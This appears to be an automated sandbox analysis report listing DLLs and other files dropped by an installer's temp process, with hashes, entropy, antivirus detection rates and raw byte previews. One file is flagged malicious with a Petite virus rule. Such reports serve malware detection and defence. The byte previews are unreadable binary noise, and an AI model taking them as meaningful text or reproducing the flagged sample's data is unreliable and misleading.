                                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....U]...........!......................... ............................................@.........................P...........d.......@...............................................................................8...............................................................@..@.rsrc...............................@..@.......................................@petite..............................`..`...........................................&MK#H..OEJ..}??...:..$ayf.r7.w(/*.d`...A(7.%p.f.>\..d."..W......[4.0..ZY..... .....~...T....9a+..'.......g!.....l...<..?Y.(..[k.I=....D.....c.*.=.?.8...D>0...#.ZdO..Z...%......X.P..bS..s..=$...m.N........A......A4..J>Wa.N..K.>....2n8.ii.#....y#.J ....i!...a7..Pbl@B.%h0..8RSr.........]..z.\...x..e..5.3.$h. <G.3....-......Q....O0..,......Y}......@...<...t.H).T..! .....ap......Tj.o...0b...`..yX.. g...hzA...b.7.s$M.... ..'....\$...H.\.l.C g..4..(.6@.Q....B(..
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):17472
                                                                                                          Entropy (8bit):7.524548435291935
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:IwwsQD13cT5HhSVeEQNW5kbbcGEh/qTio+lyTnGy:QRD13ySVeEOW5kbSSTHNTnr
                                                                                                          MD5:7B52BE6D702AA590DB57A0E135F81C45
                                                                                                          SHA1:518FB84C77E547DD73C335D2090A35537111F837
                                                                                                          SHA-256:9B5A8B323D2D1209A5696EAF521669886F028CE1ECDBB49D1610C09A22746330
                                                                                                          SHA-512:79C1959A689BDC29B63CA771F7E1AB6FF960552CADF0644A7C25C31775FE3458884821A0130B1BAB425C3B41F1C680D4776DD5311CE3939775A39143C873A6FE
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L....^.L...........!....%v..%.......6........`......................................................................h..................@....................F...............................................................................................p.......8..................`....rsrc...........@....B..............@..@....................................@...........%...........................`.......................................X...x..0....j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.,..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X....................Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..D..%...........|...CC.......p......n....<.......`..............lH......)...............
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35588
                                                                                                          Entropy (8bit):7.817557274117395
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                                          MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                                          SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                                          SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                                          SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L.....yX...........!.................@.......................................P............@.........................PB.......A..d.... ..@...................P........................................................A..8...............................................................@..@.rsrc........ ......................@..@.............0.........................@petite.......@......................`..`...................................._3.....g.ge..7t...R-_.R.@c.S.\..J?L.EZ.,....=H8..;.QJ.....P-)eFs93:.^...f......}..?...e...SD.......-.u.......q2...P...6..z5.T.S..P..Q....@..Mq.>....8" F...,..FE...S.[U..c......jr....b...-%...`......w..+W.C......]..#......LS....W.Y....o.8...i.[)..%(.2.t...YY .bL.....b.@&J,?l.........$..F..&...a#.\[".^...&]co....K.>...xQzw..XW.uT..+dm.o.b...@c....3..r....@]...P........{C/.....A!.&..........'....._..."S..&..F.......:.dxtK.6...7.I...Q..Nm2.....NX..fG..L..7.?..".(
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:Unicode text, UTF-8 text
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1059
                                                                                                          Entropy (8bit):5.1208137218866945
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:24:LLDrmJHHH0yN3gtsHw1hj9QHOsUv4eOk4/+/m3oqLF5n:LLDaJHlxE35QHOs5exm3ogF5n
                                                                                                          MD5:B7EDCC6CB01ACE25EBD2555CF15473DC
                                                                                                          SHA1:2627FF03833F74ED51A7F43C55D30B249B6A0707
                                                                                                          SHA-256:D6B4754BB67BDD08B97D5D11B2D7434997A371585A78FE77007149DF3AF8D09C
                                                                                                          SHA-512:962BD5C9FB510D57FAC0C3B189B7ADEB29E00BED60F0BB9D7E899601C06C2263EDA976E64C352E4B7C0AAEFB70D2FCB0ABEF45E43882089477881A303EB88C09
                                                                                                          Malicious:false
                                                                                                          Preview:Copyright (c) 2011 Jan Kokem.ller..Permission is hereby granted, free of charge, to any person obtaining a copy.of this software and associated documentation files (the "Software"), to deal.in the Software without restriction, including without limitation the rights.to use, copy, modify, merge, publish, distribute, sublicense, and/or sell.copies of the Software, and to permit persons to whom the Software is.furnished to do so, subject to the following conditions:..The above copyright notice and this permission notice shall be included in.all copies or substantial portions of the Software...THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR.IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,.FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE.AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER.LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,.OUT OF OR IN CONNECTION WITH
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):16910
                                                                                                          Entropy (8bit):5.289608933932413
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:ohtyjknGC7hipL+9mLYFOozxkdlDNUwS5Qq:UGknGC74l+MUFI7C
                                                                                                          MD5:2F040608E68E679DD42B7D8D3FCA563E
                                                                                                          SHA1:4B2C3A6B8902E32CDA33A241B24A79BE380C55FC
                                                                                                          SHA-256:6B980CADC3E7047CC51AD1234CB7E76FF520149A746CB64E5631AF1EA1939962
                                                                                                          SHA-512:718AF5BE259973732179ABA45B672637FCA21AE575B4115A62139A751C04F267F355B8F7F7432B56719D91390DABA774B39283CBCFE18F09CA033389FB31A4FC
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........B.........#.........>...f...........0.....h......................... ................ .........................{.......|...............................$...........................pA.......................................................text...4...........................`.P`.data...<....0......."..............@.0..rdata.......@.......$..............@.`@/4...........P.......(..............@.0@.bss.....d...`........................`..edata..{............2..............@.0@.idata..|............4..............@.0..CRT....,............:..............@.0..tls.................<..............@.0..reloc..$............>..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):15374
                                                                                                          Entropy (8bit):5.192037544202194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:lhgkOI7BGi9gKV6uq+u6JewsNhNXUwSCgQ:DT7BGVKPKbXF
                                                                                                          MD5:BEFD36FE8383549246E1FD49DB270C07
                                                                                                          SHA1:1EF12B568599F31292879A8581F6CD0279F3E92A
                                                                                                          SHA-256:B5942E8096C95118C425B30CEC8838904897CDEF78297C7BBB96D7E2D45EE288
                                                                                                          SHA-512:FD9AA6A4134858A715BE846841827196382D0D86F2B1AA5C7A249B770408815B0FE30C4D1E634E8D6D3C8FEDBCE4654CD5DC240F91D54FC8A7EFE7CAE2E569F4
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........<.........#.........8...............0.....f................................b......... ......................p..E.......h...........................................................P@......................................................text...............................`.P`.data...,....0....... ..............@.0..rdata.......@......."..............@.0@/4...........P.......$..............@.0@.bss.........`........................`..edata..E....p......................@.0@.idata..h............0..............@.0..CRT....,............6..............@.0..tls.................8..............@.0..reloc...............:..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):197646
                                                                                                          Entropy (8bit):6.1570532273946625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                                          MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                                          SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                                          SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                                          SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):31936
                                                                                                          Entropy (8bit):6.6461204214578
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:SEEn30ilOAb++HynTDbc3fwaVCPxWE/MM:SEa0YOU1HgU3fwaVCPxqM
                                                                                                          MD5:72E3BDD0CE0AF6A3A3C82F3AE6426814
                                                                                                          SHA1:A2FB64D5B9F5F3181D1A622D918262CE2F9A7AA3
                                                                                                          SHA-256:7AC8A8D5679C96D14C15E6DBC6C72C260AAEFB002D0A4B5D28B3A5C2B15DF0AB
                                                                                                          SHA-512:A876D0872BFBF099101F7F042AEAF1FD44208A354E64FC18BAB496BEEC6FDABCA432A852795CFC0A220013F619F13281B93ECC46160763AC7018AD97E8CC7971
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........P.........#.....&...L...............@.....d................................8......... .........................b............................P...,...................................R......................x................................text....%.......&..................`.P`.data........@.......*..............@.`..rdata.......P.......,..............@.0@/4...........`.......2..............@.0@.bss.........p........................`..edata..b............>..............@.0@.idata...............@..............@.0..CRT....,............H..............@.0..tls.................J..............@.0..reloc...............L..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):197120
                                                                                                          Entropy (8bit):6.423554884287906
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:X+dMKihenEUunaA+mVMISPCG5vHglwiaJVZkRyAHeOdrQpCklkHy+axeY0R2JdXs:MagxOOZWP2dC28d+y2e
                                                                                                          MD5:67247C0ACA089BDE943F802BFBA8752C
                                                                                                          SHA1:508DA6E0CF31A245D27772C70FFA9A2AE54930A3
                                                                                                          SHA-256:BAB8D388EA3AF1AABB61B8884CFAA7276A2BFD77789856DD610480C55E4D0A60
                                                                                                          SHA-512:C4A690A53581D3E4304188FD772C6F1DA1C72ED2237A13951ACE8879D1986423813A6F7534FF506790CB81633CEB7FF6A6239C1F852725FBACA4B40D9AE3F2DB
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......d,.. M.. M.. M..4&..-M..4&...M..4&..3M..r8...M..r8../M..r8..1M..4&..#M.. M.._M..v8..$M..v8..!M..v8..!M..v8..!M..Rich M..........PE..L... ..a...........!.........................................................@............@.........................@...p.......(............................ ..(...P...8...............................@...............H............................text...>........................... ..`.rdata..d...........................@..@.data...H...........................@....rsrc...............................@..@.reloc..(.... ......................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):115712
                                                                                                          Entropy (8bit):6.401537154757194
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:rY4gILp0Vt7BMkvfHutO+eP0ZjflQf5xqkYXeo21sb2rqG70:rY4gILp0Vt77nLBCtQfjqv8qG70
                                                                                                          MD5:840D631DA54C308B23590AD6366EBA77
                                                                                                          SHA1:5ED0928667451239E62E6A0A744DA47C74E1CF89
                                                                                                          SHA-256:6BAD60DF9A560FB7D6F8647B75C367FDA232BDFCA2291273A21179495DAC3DB9
                                                                                                          SHA-512:1394A48240BA4EF386215942465BDE418C5C6ED73FC935FE7D207D2A1370155C94CDC15431985ED4E656CA6B777BA79FFC88E78FA3D99DB7E0E6EAC7D1663594
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......?..R{...{...{...o...q...o.......o...i...)...W...)...t...)...j...o...x...{.......-...s...-...z...-.4.z...-...z...Rich{...........PE..L....H.a...........!.....$...........h.......@............................... ............@.............................x.......(.......................................8..............................@............@..D............................text....#.......$.................. ..`.rdata...x...@...z...(..............@..@.data.... ..........................@....rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):62478
                                                                                                          Entropy (8bit):6.063363187934607
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:q3s6+NMpjqudP/XB9rGCWLEc6wY3U0LvDcb0wGNPdqdRJy/5f4mdajO42iySAqB:q8zNM1nBId/ce7GNP6m/5AQGySAs
                                                                                                          MD5:940EEBDB301CB64C7EA2E7FA0646DAA3
                                                                                                          SHA1:0347F029DA33C30BBF3FB067A634B49E8C89FEC2
                                                                                                          SHA-256:B0B56F11549CE55B4DC6F94ECBA84AEEDBA4300D92F4DC8F43C3C9EEEFCBE3C5
                                                                                                          SHA-512:50D455C16076C0738FB1FECAE7705E2C9757DF5961D74B7155D7DFB3FAB671F964C73F919CC749D100F6A90A3454BFF0D15ED245A7D26ABCAA5E0FDE3DC958FD
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................k.........................`................ .........................r.......D............................P..|.......................................................\............................text...............................`.P`.data...0...........................@.0..rdata..8...........................@.`@/4......L...........................@.0@.bss..................................`..edata..r...........................@.0@.idata..D...........................@.0..CRT....,....0......................@.0..tls.........@......................@.0..reloc..|....P......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):26126
                                                                                                          Entropy (8bit):6.048294343792499
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:hhkxE9v7/GRm4v5OxlBWaEybb9p7aCyS/hU7CateHcUwSCnq6D:Yx6jGXvc5WaBb99yS/hQh
                                                                                                          MD5:D1223F86EDF0D5A2D32F1E2AAAF8AE3F
                                                                                                          SHA1:C286CA29826A138F3E01A3D654B2F15E21DBE445
                                                                                                          SHA-256:E0E11A058C4B0ADD3892E0BEA204F6F60A47AFC86A21076036393607235B469C
                                                                                                          SHA-512:7EA1FFB23F8A850F5D3893C6BB66BF95FAB2F10F236A781620E9DC6026F175AAE824FD0E03082F0CF13D05D13A8EEDE4F5067491945FCA82BBCDCF68A0109CFF
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L........f.........#.....6...b...............P.....h................................8-........ .........................i...................................................................Lk......................................................text....4.......6..................`.P`.data...,....P.......:..............@.0..rdata.......`.......<..............@.`@/4......T....p.......J..............@.0@.bss..................................`..edata..i............V..............@.0@.idata...............X..............@.0..CRT....,............^..............@.0..tls.................`..............@.0..reloc...............b..............@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):18966
                                                                                                          Entropy (8bit):7.620111275837424
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:gOKwxnw6OVDU839fgRgFMkucNauTT80CyTIz2bGjqXOK0Jo:gOHwBDUOe2McQkI0Cyo2Q/o
                                                                                                          MD5:F0F973781B6A66ADF354B04A36C5E944
                                                                                                          SHA1:8E8EE3A18D4CEC163AF8756E1644DF41C747EDC7
                                                                                                          SHA-256:04AB613C895B35044AF8A9A98A372A5769C80245CC9D6BF710A94C5BC42FA1B3
                                                                                                          SHA-512:118D5DACC2379913B725BD338F8445016F5A0D1987283B082D37C1D1C76200240E8C79660E980F05E13E4EB79BDA02256EAC52385DAA557C6E0C5D326D43A835
                                                                                                          Malicious:true
                                                                                                          Yara Hits:
                                                                                                          • Rule: JoeSecurity_PetiteVirus, Description: Yara detected Petite Virus, Source: C:\Program Files (x86)\CRTGame\bin\x86\is-001GJ.tmp, Author: Joe Security
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 3%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L...9#.]...........!.........B...............p............................................@.....................................x.......@....................M..........................................................@............................................>..................@..@.rsrc................@..............@..@.......................................@petite...............D..............`..`....................................g5 ....S%,_ .]/.0$R.yB..."@...N.AGG.^.?...1.........&?....v....6.0.. ME..(..gh\jv#.l..#$.Z&...._\`.@.......D.;.C~..m}3..\>.h..@.;.f Tho...(xVs..m.c..F..SS.C...z[....z...... .X.&....HY,...o.d..jP.nr..@.)..W.1#...b..Q.*E8.B..N5.....].........7..A..2c.M.q.O0(.Gi..B.....CT.(..+....>@T j.#!..."..P.u.3..5.Q0K..p....ERvG..._'...ir%m...NT.v:.....g.....8.+....m....8..Z.=.B.......D_..ln...C.......p8...e."...U...+.f..E.=X.j.DeD.X_.Y..n.r.!xWu..\.VB.......`.F.A....dx...
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (console) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):197646
                                                                                                          Entropy (8bit):6.1570532273946625
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:3072:brPGp0y4SP+iBGgySYm+dE3sYrJqkAzhU88vsAGSW+:brPGaTEsHSYmbbOU8osAGG
                                                                                                          MD5:2C8EC61630F8AA6AAC674E4C63F4C973
                                                                                                          SHA1:64E3BB9AA505C66E87FE912D4EA3054ADF6CEF76
                                                                                                          SHA-256:DFD55D0DDD1A7D081FCE8E552DC29706A84DC6CA2FDD2F82D63F33D74E882849
                                                                                                          SHA-512:488378012FB5F477ED4636C37D7A883B1DAD0FBC671D238B577A9374EFE40AB781F5E483AE921F1909A9B7C1C2A3E78E29B533D3B6FFE15AAEE840CAD2DCF5D0
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..................#...............................m................................]_........ ...................... ..A....0...............................`..............................p0.......................1..D............................text...............................`.P`.data...............................@.0..rdata..L0.......2..................@.`@/4...........P......................@.0@.bss..................................`..edata..A.... ......................@.0@.idata.......0......................@.0..CRT....,....@......................@.0..tls.........P......................@.0..reloc.......`......................@.0B................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):258560
                                                                                                          Entropy (8bit):6.491223412910377
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:X+FRYMGwNozw5upAagZnb80OXrGSc+w9nI7ZMcyVhk233M:SGMGbw5upAagZb80SMXzkgM
                                                                                                          MD5:DB191B89F4D015B1B9AEE99AC78A7E65
                                                                                                          SHA1:8DAC370768E7480481300DD5EBF8BA9CE36E11E3
                                                                                                          SHA-256:38A75F86DB58EB8D2A7C0213861860A64833C78F59EFF19141FFD6C3B6E28835
                                                                                                          SHA-512:A27E26962B43BA84A5A82238556D06672DCF17931F866D24E6E8DCE88F7B30E80BA38B071943B407A7F150A57CF1DA13D2137C235B902405BEDBE229B6D03784
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......B.j..f...f...f..]....f..]...f..]....f......f......f......f......f..]....f...f..]f......f......f......f...f...f......f..Rich.f..........PE..L...y.._...........!................@........ ...............................@..........................................d...$...(.......h.................... ......................................(...@............ ..8............................text...q........................... ..`asmcode.>$.......&.................. ..`.rdata..B.... ......................@..@.data...............................@....rsrc...h...........................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):967168
                                                                                                          Entropy (8bit):6.500850562754145
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:j2ezAN6FpYQSzclODziLQEkkDHFb1aWGssVvVmPUwV+SiRm7rhj:jhAgFptPlqmPDHJ1apVdYUy+jRmX
                                                                                                          MD5:C06D6F4DABD9E8BBDECFC5D61B43A8A9
                                                                                                          SHA1:16D9F4F035835AFE8F694AE5529F95E4C3C78526
                                                                                                          SHA-256:665D47597146DDAAA44B771787B750D3CD82C5B5C0B33CA38F093F298326C9BB
                                                                                                          SHA-512:B0EBE9E2682A603C34F2B884121FA5D2D87ED3891990CCD91CD14005B28FE208A3B86FA20E182F9E7FC5142A267C8225AEFDCB23CF5B7556D2CF8F9E3BDE62D4
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V.~..m...m...m......m.....m......m.......m..)3...m..)3...m..)3...m.......m...m..rm...m..m..3...m..3...m..3...m..Rich.m..........................PE..L...8..^...........!.........&.......`....................................................@..........................4.......G..<...............................HR..P+..T............................+..@...............D............................text............................... ..`.rdata..............................@..@.data........P...$...D..............@....trace.......`.......h..............@..@.gfids...............~..............@..@_RDATA..@...........................@..@.debug_o............................@..B.rsrc................l..............@..@.reloc..HR.......T...n..............@..B................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):337408
                                                                                                          Entropy (8bit):6.515131904432587
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:3nzsyDn7PDS+FDflUjvJUkbEOyF1rOpsuCOuOff5k4F/lTRHA:3377SKfgvqkbFyFJCRRzH
                                                                                                          MD5:62D2156E3CA8387964F7AA13DD1CCD5B
                                                                                                          SHA1:A5067E046ED9EA5512C94D1D17C394D6CF89CCCA
                                                                                                          SHA-256:59CBFBA941D3AC0238219DAA11C93969489B40F1E8B38FABDB5805AC3DD72BFA
                                                                                                          SHA-512:006F7C46021F339B6CBF9F0B80CFFA74ABB8D48E12986266D069738C4E6BDB799BFBA4B8EE4565A01E90DBE679A96A2399D795A6EAD6EACBB4818A155858BF60
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........@..|...|...|...p...|...w...|.d.r...|...v...|...x...|.i.#...|...}.|.|.d.!...|...w...|..V....|...v...|.......|. .z...|.Rich..|.........PE..L....r.b.....................>......\........ ....@.......................................@.....................................x....0.......................@...3................................................... ..(............................text............................... ..`.rdata..r.... ......................@..@.data....'..........................@....sxdata...... ......................@....rsrc........0......................@..@.reloc...<...@...>..................@..B........................................................................................................................................................................................................................................................
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):19008
                                                                                                          Entropy (8bit):7.672481244971812
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:384:dz7otnjFa4ECX3yeGjA+tSXGnUav92hca+XWRlsuG+is:po7GU+szS3W7sQ7
                                                                                                          MD5:8EE91149989D50DFCF9DAD00DF87C9B0
                                                                                                          SHA1:E5581E6C1334A78E493539F8EA1CE585C9FFAF89
                                                                                                          SHA-256:3030E22F4A854E11A8AA2128991E4867CA1DF33BC7B9AFF76A5E6DEEF56927F6
                                                                                                          SHA-512:FA04E8524DA444DD91E4BD682CC9ADEE445259E0C6190A7DEF82B8C4478A78AAA8049337079AD01F7984DBA28316D72445A0F0D876F268A062AD9B8FF2A6E58D
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Preview:MZ......................@...................................D.... ..PE..L....+vS...........!....6...6.......6........p......................................................................0..........P.......@...................tM.......................................................................................................>..................`....rsrc...........@....H..............@..@....................................@...........6...........................`.......................................D...n'......j...f.!.PRj.....j..S.ERROR!.Corrupt Data!......f.`P....h.5..j..P..C.h.....<$.3f....t...;S.^......Vj.PWj.j.Vj.PW....Y.Yf..X........X............f.......Z...t..$.4..l$..m..J...R...z.....XXXXZt.D$...*.P(.*.....P...s.j.h`...h`.....j.h....h....j.3.3.0_.K~..[...s.3..^......s...$A."...L$..<.........;D$....;D$......$. ............u...........V+.48.^...u.........A............r..I..K..........(...|...}K...................E..K....p..j...g........Q..........y...........
                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-U7RFK.tmp\Mg5bMQ2lWi.tmp
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):35588
                                                                                                          Entropy (8bit):7.817557274117395
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:dCrMZHv56WRldhmLjQDrbfc8cznHvc6modHQ:sAR0LzHvc6m2HQ
                                                                                                          MD5:58521D1AC2C588B85642354F6C0C7812
                                                                                                          SHA1:5912D2507F78C18D5DC567B2FA8D5AE305345972
                                                                                                          SHA-256:452EEE1E4EF2FE2E00060113CCE206E90986E2807BB966019AC4E9DEB303A9BD
                                                                                                          SHA-512:3988B61F6B633718DE36C0669101E438E70A17E3962A5C3A519BDECC3942201BA9C3B3F94515898BB2F8354338BA202A801B22129FC6D56598103B13364748C1
                                                                                                          Malicious:false
                                                                                                          Yara Hits:
